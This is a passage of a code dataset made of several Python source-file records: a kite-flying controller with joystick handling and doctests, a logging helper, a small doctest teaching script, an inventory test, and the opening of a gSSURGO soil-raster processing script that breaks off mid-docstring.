>>> c=Controls(1)\n >>> calcbarangle(k,b,c)\n 10\n\n >>> k=Kite(400, phase='TurnR', targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n >>> c=Controls(1)\n >>> calcbarangle(k,b,c)\n 40\n \"\"\"\n\n if kite.phase == \"TurnR\" or kite.phase == \"TurnL\":\n return setangleturn(kite, base)\n else:\n return setangle(kite, base, controls)\n\n\ndef inferangle(kite, base, controls=None):\n \"\"\"This will return inferred angle of the control bar based on the kite angle\n obviously this is a huge approximation of reality but should help with review\n of actual changes of the bar versus what we would like to happen ie no lag when\n testing\n\n >>> k=Kite(400, kiteangle=10)\n >>> b=Base(barangle=15, kitebarratio=2.0)\n >>> c=Controls(1)\n >>> inferangle(k, b, c)\n 5.0\n \"\"\"\n return kite.kiteangle / base.kitebarratio\n\n\ndef setangle(kite, base, controls):\n \"\"\"This will return targetbarangle for park mode based largely on kite target angle\n We will start simple but may move to a pid mode if required\n\n >>> k=Kite(400, targetangle=10)\n >>> b=Base(barangle=15, kitebarratio=2)\n >>> c=Controls(1)\n >>> setangle(k,b,c)\n 10\n \"\"\"\n\n # targetbarangle = checklimits((kite.targetangle * base.kitebarratio), base.maxleft, base.maxright)\n targetbarangle = checklimits(kite.targetangle, base.maxleft, base.maxright)\n return targetbarangle\n\n\ndef setangleturn(kite, base):\n \"\"\"This should be a simple function as we will always aim to turn as fast as poss\n identifying the point to ease off from max turn should be done as part of phase setting and not here\n\n >>> k=Kite(400)\n >>> b=Base(400)\n >>> setangleturn(k,b)\n -40\n \"\"\"\n\n targetbarangle = base.maxright if kite.phase == \"TurnR\" else base.maxleft\n return targetbarangle\n\n\nclass Config(object):\n def __init__(self, source=2, kite='Standard', masklimit=10000,\n logging=0, numcams=1, check_motor_sim=False, setup='Standard'):\n self.source = source\n self.kite = kite\n self.masklimit = masklimit\n self.logging = logging\n self.numcams = numcams\n self.check_motor_sim = check_motor_sim\n self.setup = setup\n self.writer = None\n\n @staticmethod\n def getlogheaders():\n return ('source', 'kite', 'masklimit', 'numcams', 'check_motor_sim', 'setup')\n\n def getlogdata(self):\n return (self.source, self.kite, self.masklimit, self.numcams, self.check_motor_sim, self.setup)\n\n\nclass Base(object):\n def __init__(self, barangle=0, parkangle=0, maxright=conmaxright, maxleft=conmaxleft, lag=1,\n targetbarangle=0, kitebarratio=1, inferbarangle=0, resistleft=conresistleft,\n resistright=conresistright, resistcentre=conresistcentre, safety=False):\n self.barangle = barangle\n self.parkangle = parkangle\n self.maxright = maxright\n self.maxleft = maxleft\n self.lag = lag\n self.barangles = deque(maxlen=16)\n self.targetbarangle = targetbarangle\n self.inferbarangle = inferbarangle\n self.kitebarratio = kitebarratio # this will be the rate of change of barangle to kite angle\n self.mockangle = 0\n self.reset = False\n self.action = None\n self.resistance = 0\n self.dist_act = 35.0 # Radius from fulcrum to attachment point of actuator - we will have two actuators\n self.speed_act = 30.0\n self.actuator_length = 60\n self.calibrate = False\n self.calibrate_phase = 0\n self.start_time = 0\n self.calibrate_list = []\n self.resistright = resistright\n self.resistleft = resistleft\n self.resistcentre = resistcentre\n self.manual_calib_phases = ['Bar to straight (0 degrees) and press set or - key on wii',\n 'Bar to 20 degrees left and press set or - key on wii',\n 'Bar to 20 degrees right and press set or - key on wii']\n self.manual_calib_phase = 0\n self.plan_calibration()\n self.safety = safety\n\n @staticmethod\n def getlogheaders():\n return ('B.barangle', 'B.parkangle', 'B.maxright', 'B.maxleft', 'B.mockangle', 'B.targetbarangle',\n 'B.inferbarangle', 'B.action', 'B.resistance', 'B.dist_act', 'B.speed_act', 'B.calibrate',\n 'B.manual_calib_phase')\n\n def getlogdata(self):\n return (self.barangle, self.parkangle, self.maxright, self.maxleft, self.mockangle, self.targetbarangle,\n self.inferbarangle, self.action, self.resistance, self.dist_act, self.speed_act, self.calibrate,\n self.manual_calib_phase)\n\n\n def get_calibrate_time(self):\n # idea here is to have an expectation of how the setup should work based on components\n # believed to be there - and also identify if resistor is working as expected\n circ_act = 2 * math.pi * self.dist_act * 2 # because going to move each army separately\n rev_time = circ_act / self.speed_act # time for one revolution\n print(f\"self.maxright=\")\n return 1000 * (rev_time * self.maxright / 360.0) # expected time to get to max angle in millisecs\n\n def calibration_check(self):\n # This should basically wiggle the bar and put it into position to start if results\n # not good process would be to start manual calibration from the ManBar mode\n curr_millis = round(time.monotonic() * 1000)\n elapsed_millis = curr_millis - self.start_time\n if elapsed_millis > self.calibrate_list[self.calibrate_phase][1]:\n self.calibrate_list[self.calibrate_phase][2] = elapsed_millis\n self.calibrate_list[self.calibrate_phase][4] = self.resistance\n self.start_time = curr_millis\n self.calibrate_phase += 1\n if self.calibrate_phase == 4: # valid values are 0 to 3 this is end of loop\n self.calibrate = False\n self.calibrate_phase = 0\n self.action = 0\n self.action = self.calibrate_list[self.calibrate_phase][5]\n else: # increase cycle counter\n self.calibrate_list[self.calibrate_phase][6] += 1\n self.calibrate_list[self.calibrate_phase][7].append(self.resistance)\n return\n\n def plan_calibration(self):\n # this should initalise a list of phases that the calibration will\n # take I think name, motormsg, target time, should work\n target_time = int(self.get_calibrate_time()) # this is assumed to be constant for all phases\n self.action = 6\n\n for x, y in enumerate(range(4)):\n if (x % 2) == 0:\n action = 'fullright'\n motor_action = 6 # Left motor activated\n target_resist = getresist(self.maxright)\n else:\n action = 'centre' # so right motor will drive\n motor_action = 7\n target_resist = getresist(0) # should return to square\n self.calibrate_list.append([action, target_time, 0, target_resist, 0, motor_action, 0, []])\n return\n\n def set_resistance(self, control):\n # this should set the resistance for particular angle on the base unit and\n # is triggered when the set button is pressed\n # TODO refactor resistance into a list or dict\n if self.manual_calib_phase == 0:\n self.resistcentre = self.resistance\n elif self.resistance != self.resistcentre: # avoid division by zero errs\n if self.manual_calib_phase == 1:\n self.resistleft = self.resistance\n else:\n self.resistright = self.resistance\n\n if self.manual_calib_phase < 2:\n self.manual_calib_phase += 1\n else:\n self.manual_calib_phase = 0\n print('Calibration Left Centre Right' + str(self.resistleft)\n + ' ' + str(self.resistcentre) + ' ' + str(self.resistright))\n # if self.manual_calib_phase < 2 else 0\n control.newbuttons = control.get_change_phase_buttons(self)\n return\n\n\nclass Kite(object):\n\n def __init__(self, x=0, y=0, mode='Park', phase='Park', targetheading=0, targetangle=0, kiteangle=0):\n self.x = x\n self.y = y\n self.mode = mode\n self.phase = phase\n self.pts = deque(maxlen=16)\n self.kiteangles = deque(maxlen=16)\n self.timestamps = deque(maxlen=16)\n (self.dX, self.dY) = (0, 0)\n self.direction = \"\"\n self.kiteangle = kiteangle\n self.contourarea = 0\n self.zone = \"Centre\"\n self.targettype = 'Angle'\n self.targetx = 0\n self.targety = 0\n self.changezone = True\n self.changephase = False\n self.routechange = False\n self.found = False\n self.targetheading = targetheading\n self.targetangle = targetangle\n self.thickness = 1\n self.leftballx = 0\n self.leftbally = 0\n self.rightballx = 0\n self.rightbally = 0\n self.turncomplete = False\n self.turncomplete_angle = 60\n self.autofly = False\n return\n\n\n @staticmethod\n def getlogheaders():\n return ('K.x', 'K.y', 'K.mode', 'K.phase', 'K.direction', 'K.kiteangle', 'K.contourarea',\n 'K.targettype', 'K.targetx', 'K.targety', 'K.changezone', 'K.changephase', 'K.routechange',\n 'K.changephase', 'K.routechange', 'K.found', 'K.targetheading', 'K.targetangle')\n\n\n def getlogdata(self):\n return (self.x, self.y, self.mode, self.phase, self.direction, self.kiteangle, self.contourarea,\n self.targettype, self.targetx, self.targety, self.changezone, self.changephase, self.routechange,\n self.changephase, self.routechange, self.found, self.targetheading, self.targetangle)\n\n def get_zone(self, leftx, rightx):\n \"\"\"\n >>> k=Kite(400)\n >>> k.get_zone(100,600)\n 'Left'\n\n >>> l=Kite(400)\n >>> l.get_zone(300,600)\n 'Centre'\n :param leftx:\n :param rightx:\n :return:\n \"\"\"\n\n self.zone = 'Left' if self.x < leftx else 'Right' if self.x > rightx else 'Centre'\n return self.zone\n\n def get_phase(self):\n if self.mode == 'Park':\n # For park this is now OK we want to get kiteangle to zero\n self.phase = 'Hold'\n elif self.mode == 'Wiggle':\n self.phase = 'Wiggle'\n else: # fig8 - assumed\n if self.zone == 'Centre':\n self.phase = 'Xwind'\n elif self.zone == 'Left':\n if self.turncomplete or self.kiteangle > self.turncomplete_angle:\n self.phase = 'Xwind'\n self.turncomplete = True\n self.routechange = True\n else:\n self.phase = 'TurnRight'\n else: # Right zone\n if self.turncomplete or self.kiteangle < (0 - self.turncomplete_angle):\n self.phase = 'Xwind'\n self.turncomplete = True\n self.routechange = True\n else:\n self.phase = 'Turnleft'\n return\n\n def update_zone(self, control):\n currentzone = self.zone\n self.get_zone(control.routepoints[0][0], control.routepoints[3][0])\n self.changezone = True if self.zone != currentzone else False\n if self.changezone: # set to false at start of next turn\n self.turncomplete = False\n return\n\n def update_phase(self):\n currentphase = self.phase\n self.get_phase()\n self.changephase = True if self.phase != currentphase else False\n return\n\n def get_wiggle_angle(self):\n x = -10 if self.kiteangle > 0 else 10\n return x\n\n def update_target(self, leftx, lefty, centrex, centrey, rightx, righty):\n # this gets called when mode, zone, phase or route changes\n if self.mode == 'Park':\n # For park this is now OK we want to get kiteangle to zero\n self.targettype = 'Angle'\n self.targetangle = 0\n self.targetx = centrex\n self.targety = centrey\n elif self.mode == 'Wiggle':\n self.targettype = 'Angle'\n self.targetangle = self.get_wiggle_angle()\n self.targetx = centrex\n self.targety = centrey\n else: # fig8 - by definition\n if self.zone == 'Centre' or self.phase == 'Xwind':\n # Either we have just left the right or left turnzone so if nearest\n # left we go right and if nearest right we go left\n # or we have changed from park or wiggle to xwind which will be presumed to happen\n # with kite upwards and seems reasonable to just go for the longer xwind distance\n self.targettype = 'Point'\n if abs(self.x - leftx) > abs(self.x - rightx):\n self.targetx = leftx\n self.targety = lefty\n else:\n self.targetx = rightx\n self.targety = righty\n # self.targetangle = get_heading_points((self.x, self.y), (self.targetx, self.targety))\n elif self.changezone: # think we should still set this roughly in the turn phase\n self.targettype = self.phase\n if self.phase == 'TurnR':\n self.targetangle = 90\n else:\n self.targetangle = -90\n # TODO - may compute the target location\n else:\n print('End of update_target reached without cover expected cases most likely')\n # TODO ensure change of flight mode is barred unless in the centre zone -\n # seems sensible and should\n # mean changemode and changephase generally only triggered in centre zone\n return\n\n def move_kite(self, control, speed=10):\n # This moves a manual kite in autofly mode towards the target while in the centre zone - however when\n # in turn the target only moves when we get back out of the turn zone so instead we probaby want to pick up\n # the apex of fig 8 and then on up to the top which we just fly through and then the target will change again\n # pass lets start with figuring out the actual targetx and targety\n if self.zone == 'Centre':\n movex, movey = self.targetx, self.targety\n # want to move beyond the target so extend x\n elif self.zone == 'Left': # this just takes us to top of zone\n movex, movey = control.routepoints[3]\n else: # Right\n movex, movey = control.routepoints[0]\n\n # Ensure we go past the point which toggles the change of zone\n adjustx = 20 if movex >= control.centrex else -20\n movex += adjustx\n self.x, self.y = move_item(self.x, self.y, movex, movey, speed)\n return\n\nclass Controls(object):\n\n def __init__(self, config='Standard', step=8, motortest=False):\n try: # this will fail on windows but don't need yet and not convinced I need to set parameters separately\n self.centrex = rospy.get_param('centrex', 800)\n self.centrey = rospy.get_param('centrey', 300)\n self.halfwidth = rospy.get_param('halfwidth', 200)\n self.radius = rospy.get_param('radius', 100)\n except (NameError, KeyError) as e:\n # mode='fig8'\n self.centrex = 400\n self.centrey = 300\n self.halfwidth = 200\n self.radius = 100\n self.routepoints = calc_route(self.centrex, self.centrey, self.halfwidth, self.radius)\n self.config = config # possible config ('Standard', 'Manual', 'Manbar')\n self.inputmode = 0 if self.config == 'Standard' else 2 if self.config == 'Manual' else 3\n self.step = step\n self.modestring = self.getmodestring(True)\n self.route = False\n self.maxy = 20 # this should be for top of centre line and sets they y target point for park mode\n self.slow = 0.0\n self.newbuttons = []\n self.motortest = motortest\n\n @staticmethod\n def getlogheaders():\n return ('C.config', 'C.inputmode', 'C.motortest')\n\n def getlogdata(self):\n return (self.config, self.inputmode, self.motortest)\n\n def getmodestring(self, inputmode):\n # So now always 11 buttons and first 5 and last 2 are std and iteration through should be std\n # so we would have a defined transition of names based on which change took place\n if inputmode == 0: # Standard\n return 'STD: Left Right Up Down Pause Wider Narrow Expand Contract Mode Quit'\n elif inputmode == 1:\n return 'SETFLIGHTMODE: Left Right Up Down Pause Park Wiggle Fig8 Reset Mode Quit'\n elif self.inputmode == 2:\n return 'MANFLIGHT: Left Right Up Down Pause Anti Clock Slow Fast Mode Quit'\n else: # inputmode = 3\n return 'MANBAR: Left Right Up Down Pause Anti Clock Slow Fast Mode Quit'\n\n @staticmethod\n def get_change_mode_buttons(inputmode):\n if inputmode == 0: # STD\n newbuttons = [('Mode: STD:', 'Mode: STD:'), ('Pause', 'Pause'), ('Wider', 'Wider'), ('Narrow', 'Narrow'),\n ('Expand', 'Expand'), ('Contract', 'Contract')]\n elif inputmode == 1: # SETFLIGHTMODE\n newbuttons = [('Mode: STD:', 'Mode: SETFLIGHTMODE:'), ('Wider', 'Park'), ('Narrow', 'Wiggle'),\n ('Expand', 'Fig8'), ('Contract', 'Autofly')]\n elif inputmode == 2:\n newbuttons = [('Mode: STD:', 'Mode: MANFLIGHT'), ('Wider', 'Anti'), ('Narrow', 'Clock'),\n ('Expand', 'Slow'), ('Contract', 'Fast')]\n else: # MANBAR\n newbuttons = [('Mode: STD:', 'Mode: MANBAR:'), ('Pause', 'Calib'), ('Expand', 'Set')]\n return newbuttons\n\n @staticmethod\n def get_change_phase_buttons(base):\n newbuttons = [('Mode: STD:', 'Mode:' + base.manual_calib_phases[base.manual_calib_phase])]\n return newbuttons\n\n def joyhandler(self, joybuttons, joyaxes, kite, base, control, event=None):\n # Using https://github.com/arnaud-ramey/rosxwiimote as a ros package to capture\n # the joystick message this was because std one tried to do bluetooth\n # connection to wiimote via python and it didn't work perhaps as only\n # seems to expect early versions of wiimote\n\n # The axes messages is as follows:\n # 0. left - right rocker(3 possible values: -1 = left 0 = released 1 = right)\n # 1. up - down rocker(3 possible values: -1 = left 0 = released 1 = right)\n # 2. nunchuk left - right joystick(floating value in the range - 1 = left..1 = right)\n # 3. nunchuk down - up joystick(floating value in the range - 1 = down.. 1 = up)\n\n # 0. XWII_KEY_A - this should change the mode\n # 1. XWII_KEY_B - this should toggle the rockers between move and stretch squashc\n # 2. XWII_KEY_PLUS - probably the faster button and poss some other things for playback\n # 3. XWII_KEY_MINUS - probably the slower button and poss some other things for playback in slow motion\n # 4. XWII_KEY_HOME this should be the quit key\n # 5. XWII_KEY_ONE this will do a pause or calibrate in manbar mode\n # 6. XWII_KEY_TWO and this will do a flight mode change\n # 7. XWII_KEY_C - so\n # 8. XWII_KEY_Z so bigger numchuck key should change manflight to angle kite\n\n # in terms of what we do with this the basic idea is that the nunchuk flies the kite\n # and the rockers support the route moving about\n reset_stitcher = False\n\n # events for all input modes\n if (joybuttons and joybuttons[0] == 1) or event == 'Mode': # modechange on A key\n self.inputmode += 1\n kite.barbasedangle = True if self.inputmode == 3 else False\n if self.inputmode == 4: # simple toggle around 3 modes\n self.inputmode = 0\n self.modestring = self.getmodestring(self.inputmode)\n self.newbuttons = self.get_change_mode_buttons(self.inputmode)\n base.calibrate = False # calibration always ends on Mode Change\n elif (joybuttons and joybuttons[5] == 1) or event == 'Pause': # pause on 1 key\n if control.inputmode == 3: # Manbar Calibrate\n base.calibrate = 'Manual' # then slow button becomes set to set and that actions and cycles\n base.safety = False # if starts true\n self.newbuttons = self.get_change_phase_buttons(base)\n elif not control.motortest:\n time.sleep(10)\n else:\n base.action = 500 # Stop\n elif joybuttons and joybuttons[3] == 1: # slow\n self.slow += 0.1\n elif joybuttons and joybuttons[2] == 1: # fast\n self.slow = 0.0\n\n # common handling when not in one of the man modes\n if self.inputmode == 0 or self.inputmode == 1:\n if (joybuttons and joyaxes[0] == -1) or event == 'Left': # left: # left\n if not control.motortest:\n self.centrex -= self.step\n kite.routechange = True\n else:\n base.action = 300\n elif (joybuttons and joyaxes[0] == 1) or event == 'Right': # right\n if not control.motortest:\n self.centrex += self.step\n kite.routechange = True\n else:\n base.action = 400\n elif (joybuttons and joyaxes[1] == 1) or event == 'Up': # up\n if not control.motortest:\n self.centrey -= self.step\n kite.routechange = True\n else:\n base.action = 100\n elif (joybuttons and joyaxes[1] == -1) or event == 'Down': # down\n if not control.motortest:\n self.centrey += self.step\n kite.routechange = True\n else:\n base.action = 200\n elif self.inputmode == 2 or self.inputmode == 3: # common events for Man modes\n if joybuttons:\n if joyaxes[0] != 0: # -1 = left +1 = right\n self.centrex += self.step * int(joyaxes[0])\n kite.routechange = True\n elif joyaxes[1] != 0: # 1 = up -1 = down so needs inverted\n self.centrey -= self.step * int(joyaxes[1])\n kite.routechange = True\n if event == 'Left': # left\n kite.x -= self.step\n elif event == 'Right': # right\n kite.x += self.step\n elif event == 'Up': # up\n kite.y -= self.step\n elif event == 'Down': # down\n kite.y += self.step\n elif event == 'Expand' or (joybuttons and joybuttons[3] == 1): # slow\n if base.calibrate != 'Manual':\n self.slow += 0.1\n else:\n base.set_resistance(control)\n time.sleep(0.5)\n elif event == 'Contract': # fast\n self.slow = 0.0\n\n if self.inputmode == 0: # Standard\n if event == 'Wider': # wider\n self.halfwidth += self.step\n elif event == 'Narrow': # narrower\n self.halfwidth -= self.step\n elif event == 'Expand': # expand\n self.radius += self.step\n elif event == 'Contract': # contract\n self.radius -= self.step\n elif self.inputmode == 1: # SetFlight\n if joybuttons and joybuttons[6] == 1: # move mode forward\n if kite.mode == 'Park':\n kite.mode = 'Wiggle'\n elif kite.mode == 'Wiggle':\n kite.mode = 'Fig8'\n else:\n kite.mode = 'Park'\n if event == 'Wider': # park\n kite.mode = 'Park'\n elif event == 'Narrow' and kite.zone == 'Centre': # must be in central zone to change mode\n kite.mode = 'Wiggle'\n elif event == 'Expand' and kite.zone == 'Centre': # must be in central zone to change mode\n kite.mode = 'Fig8'\n elif event == 'Contract': # Autofly\n # base.reset = True # don't think this ever did anything\n kite.autofly = True if kite.autofly == False else False\n elif self.inputmode == 2: # ManFlight - maybe switch to arrows - let's do this all\n if joybuttons:\n if joybuttons[7] == 0 and joybuttons[8] == 0:\n kite.x += (self.step * joyaxes[2])\n kite.y -= (self.step * joyaxes[3])\n else: # c or z button pressed angle the kite and automatically the bar\n kite.kiteangle += (self.step / 2 * joyaxes[2])\n if event == 'Wider': # anti clockwise\n kite.kiteangle -= self.step\n elif event == 'Narrow': # clockwise\n kite.kiteangle += self.step\n elif self.inputmode == 3: # ManBar - maybe switch to arrows - let's do this all\n if joybuttons:\n if joybuttons[7] == 0 and joybuttons[8] == 0:\n if joyaxes[2] < -0.1:\n base.action = int(300 - (joyaxes[2] * 99))\n elif joyaxes[2] > 0.1:\n base.action = int(400 + (joyaxes[2] * 99))\n elif joyaxes[3] > 0.1:\n base.action = int(100 + (joyaxes[3] * 99))\n elif joyaxes[3] < -0.1:\n base.action = int(200 - (joyaxes[3] * 99))\n else:\n base.action = 0\n print(base.action)\n else: # c or z button pressed\n kite.x += (self.step * joyaxes[2])\n kite.y -= (self.step * joyaxes[3])\n else:\n if event == 'Wider': # anti-clockwise\n base.action = 300\n elif event == 'Narrow': # clockwise\n base.action = 400\n else:\n base.action = 0\n\n return joybuttons and joybuttons[4] == 1, reset_stitcher # quit\n\n\ndef calc_route(centrex=400, centrey=300, halfwidth=200, radius=100):\n \"\"\"This just calculates the 6 points in our basic figure of eight\n should be easy enough and we then draw lines between each point and\n get the last point\n\n >>> calc_route(400, 300, 200, 100)\n [(200, 400), (100, 300), (200, 200), (600, 400), (700, 300), (600, 200)]\n\n \"\"\"\n leftx = centrex - halfwidth\n rightx = centrex + halfwidth\n pt0 = (leftx, centrey + radius)\n pt1 = (leftx - radius, centrey)\n pt2 = (leftx, centrey - radius)\n pt3 = (rightx, centrey + radius)\n pt4 = (rightx + radius, centrey)\n pt5 = (rightx, centrey - radius)\n return [pt0, pt1, pt2, pt3, pt4, pt5]\n\n\ndef _test():\n import doctest\n doctest.testmod(extraglobs={'k': Kite()})\n\n\nif __name__ == '__main__':\n # Can run with -v option if you want to confirm tests were run\n _test()\n","sub_path":"scripts/mainclasses.py","file_name":"mainclasses.py","file_ext":"py","file_size_in_byte":29264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"560778131","text":"import os\nimport logging\nfrom logging import handlers\n\n\n_log_file_cloud_dir = \"src/cloud/\"\n_log_file_error = \"log/Error.log\"\n_log_file_cloud = \"log/Cloud.log\"\n\n_level = logging.INFO\n_when = 'D'\n_backupCount = 5\n_fmt = '%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s'\n\n\ndef _get_logger(filename: str):\n logger = logging.getLogger(filename)\n format_str = logging.Formatter(_fmt)\n logger.setLevel(_level)\n\n # Print to the console\n sh = logging.StreamHandler() \n sh.setFormatter(format_str)\n logger.addHandler(sh)\n\n # Print to the file\n th = handlers.TimedRotatingFileHandler(filename = filename, when = _when, backupCount = _backupCount, encoding = 'utf-8') \n th.setFormatter(format_str)\n logger.addHandler(th)\n\n return (logger, sh, th)\n\n\nclass CloudLogger:\n def __init__(self):\n self.logger, self.sh, self.th = _get_logger(_log_file_cloud)\n self.error_logger, self.error_sh, self.error_th = _get_logger(_log_file_error)\n self.error_logger.removeHandler(self.error_sh)\n","sub_path":"src/cloud/log/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"180098526","text":"#!/usr/bin/env python3\n# October 2018\n\n\"\"\" Some functions exemplifying the use of control statements. \"\"\"\n\n__appname__ = '[test_control_flow.py]'\n__author__ = 'David Scott (david.scott18@imperial.ac.uk)'\n__license__ = \"License for this code/program\" \n__version__ = '0.0.1'\n\n## imports ##\nimport sys\nimport doctest # Import the doctest module\n\n## function ##\ndef even_or_odd(x=0):\n \"\"\"Find whether a number x is even or odd.\n \n >>> even_or_odd(10)\n '10 is Even!'\n \n >>> even_or_odd(5)\n '5 is Odd!'\n \n whenever a float is provided, then the closest integer is used: \n >>> even_or_odd(3.2)\n '3 is Odd!'\n \n in case of negative numbers, the positive is taken: \n >>> even_or_odd(-2)\n '-2 is Even!'\n \n \"\"\"\n #Define function to be tested\n if x % 2 == 0:\n return \"%d is Even!\" % x\n return \"%d is Odd!\" % x\n\n####### I SUPPRESSED THIS BLOCK: WHY? #######\n\ndef main(argv): \n \"\"\" Call even_or_odd function defined \"\"\"\n print(even_or_odd(22))\n print(even_or_odd(33))\n return 0\n\nif (__name__ == \"__main__\"):\n status = main(sys.argv)\n#############################################\n \ndoctest.testmod() # To run with embedded tests\n","sub_path":"Week2/Code/test_control_flow.py","file_name":"test_control_flow.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"440840072","text":"\"\"\"\n.. module:: inventory test\n:synopsis: tests Idea class\n:author: Corey Rayburn Yung\n:copyright: 2019\n:license: Apache-2.0\n\"\"\"\n\nfrom pathlib import Path\n\nfrom simplify.core.idea import Idea\nfrom simplify.core.inventory import Inventory\n\n\ndef test_inventory():\n idea = Idea(\n configuration = Path.cwd().joinpath('tests', 'idea_settings.ini'))\n inventory = Inventory(idea = idea)\n assert inventory.folders['root'] == Path.cwd().joinpath('..\\..')\n return\n\n\nif __name__ == '__main__':\n test_inventory()","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"579729805","text":"# ---------------------------------------------------------------------------\r\n# procSSURGO.py\r\n# Version: ArcPro / Python 3+\r\n# Creation Date: 2020-05-19\r\n# Last Edit: 2020-11-19\r\n# Creator: Kirsten R. Hazler\r\n#\r\n# Summary: Functions for processing SSURGO data and producing rasters representing soil conditions, as well as functions inspired by OpenNSPECT software to produce rasters representing interactions between soils, topography, and land cover.\r\n#\r\n# Adapted from toolbox tools and scripts used to produce the 2017 edition of the ConservationVision Watershed Model, and from information about the OpenNSPECT tool.\r\n# For background references and formulas, see: \r\n# - Virginia ConservationVision Watershed Model, 2017 Edition (NHTR 18-16; 2018)\r\n# - Technical Guide for OpenNSPECT, Version 1.1 (2012)\r\n# - Predicting soil erosion by water: a guide to conservation planning with the revised universal soil loss equation (RUSLE) (USDA Agriculture Handbook 703; 1997)\r\n\r\n# NOTE: Landcover used in these functions should be a hybrid NLCD/CCAP product. Where CCAP is coded 19 (unconsolidated shore), the NLCD data should be recoded from code 31 (barren land) to code 32.\r\n# ---------------------------------------------------------------------------\r\n\r\n# Import modules\r\nimport HelperPro\r\nfrom HelperPro import *\r\n\r\ndef SSURGOtoRaster(in_gdbList, in_Fld, in_Snap, out_Raster):\r\n '''From one or more gSSURGO geodatabases, creates a raster representing values from a specified field in the MUPOLYGON feature class. \r\n \r\n Parameters:\r\n in_gdbList: List of gSSURGO geodatabases containing added attributes\r\n in_Fld: field in MUPOLYGON feature class used to determine output raster values\r\n in_Snap: Input raster that determines output coordinate system, processing extent, cell size, and alignment\r\n out_Runoff: Output raster representing runoff score\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Specify scratch location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Empty list to contain raster paths\r\n rasterList = []\r\n \r\n # Work through loop converting polygons to rasters\r\n for gdb in in_gdbList:\r\n try:\r\n inPoly = gdb + os.sep + \"MUPOLYGON\"\r\n bname = os.path.basename(gdb).replace(\".gdb\",\"\")\r\n print(\"Working on %s\" %bname)\r\n outRast = scratchGDB + os.sep + bname\r\n PolyToRaster(inPoly, in_Fld, in_Snap, outRast)\r\n rasterList.append(outRast)\r\n except:\r\n print(\"Failed to rasterize %s\" %bname)\r\n \r\n print(\"Finalizing output and saving...\")\r\n finRast = CellStatistics(rasterList, \"MAXIMUM\", \"DATA\")\r\n finRast.save(out_Raster)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef RunoffScore_vec(in_GDB):\r\n '''To the muaggatt table and the MUPOLYGON feature class, adds a field called \"runoffScore\", with scores from 0 (no runoff) to 100 (high runoff).\r\n Scores are based on drainage classes per Table 2, page 27 in NHTR 18-16.\r\n \r\n This function modifies the input data by adding new fields. It does not modify existing fields.\r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n '''\r\n\r\n # Specify some variables\r\n muaggatt = in_GDB + os.sep + \"muaggatt\"\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # Create a field in the muaggatt table to store the runoff score value, and calculate\r\n print(\"Adding runoffScore field...\")\r\n arcpy.AddField_management(muaggatt, \"runoffScore\", \"SHORT\")\r\n codeblock = '''def score(drainclass):\r\n # Create a dictionary relating drainage classes to scores\r\n s = dict()\r\n s[\"Very poorly drained\"] = 100\r\n s[\"Poorly drained\"] = 90\r\n s[\"Somewhat poorly drained\"] = 75\r\n s[\"Moderately well drained\"] = 50\r\n s[\"Well drained\"] = 25\r\n s[\"Somewhat excessively drained\"] = 10\r\n s[\"Excessively drained\"] = 0\r\n \r\n # Deal with nulls. Most nulls are either open water or developed. \r\n # Open water doesn't matter since it will be masked out in the end. \r\n # Developed areas tend to have high runoff, so assign score of 100.\r\n try: \r\n score = s[drainclass]\r\n except:\r\n score = 100 \r\n \r\n return score\r\n '''\r\n expression = \"score(!drclassdcd!)\" \r\n print(\"Calculating runoffScore field...\")\r\n arcpy.CalculateField_management (muaggatt, \"runoffScore\", expression, 'PYTHON', codeblock)\r\n\r\n # Process: Join Runoff Score to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if \"runoffScore\" in fldNames:\r\n print(\"Deleting existing runoffScore field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, \"runoffScore\")\r\n print(\"Joining runoffScore field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", muaggatt, \"mukey\", \"runoffScore\")\r\n \r\n print(\"Mission complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef ErosionScore_vec(in_GDB):\r\n '''To the MUPOLYGON feature class, adds a field called \"KFACTWS_DCD\", containing the K-factor values extracted from gSSURGO. Also adds a field called \"erosionScore\", with scores from 0 (low erodibility) to 100 (high erodibility), derived from the K-factor value provided by gSSURGO. \r\n \r\n This function modifies the input geodatabase by adding new tables and fields. It does not modify existing fields.\r\n \r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n \r\n K-factor values range from 0.02 to 0.69*. Erosion scores are derived as described on page 6 in NHTR 18-16, except that the maximum K-factor value of 0.69, not 0.55, obtains the maximum erosion score.\r\n \r\n * per https://dec.vermont.gov/sites/dec/files/wsm/stormwater/docs/StormwaterConstructionDischargePermits/sw_9020_Erodibility_%20Guidance.pdf\r\n\r\n IMPORTANT: Prior to running this function, new data must be created within the input geodatabase, using a tool in the Soil Data Development Toolbox. Tools in this toolbox can only be run from within ArcMap (not ArcPro) and I haven't figured out a way to automate this with a script, so you need to do it manually.\r\n \r\n The Soil Data Development Toolbox must be added to ArcToolbox in ArcMap, and is available from https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/home/?cid=nrcs142p2_053628#tools.\r\n \r\n TO CREATE THE DATA NEEDED FOR THIS FUNCTION:\r\n - Within ArcMap, add the MUPOLYGON feature class as a layer. \r\n - NOTE: If you will be working on data from multiple databases, it is recommended that you rename the layer in the 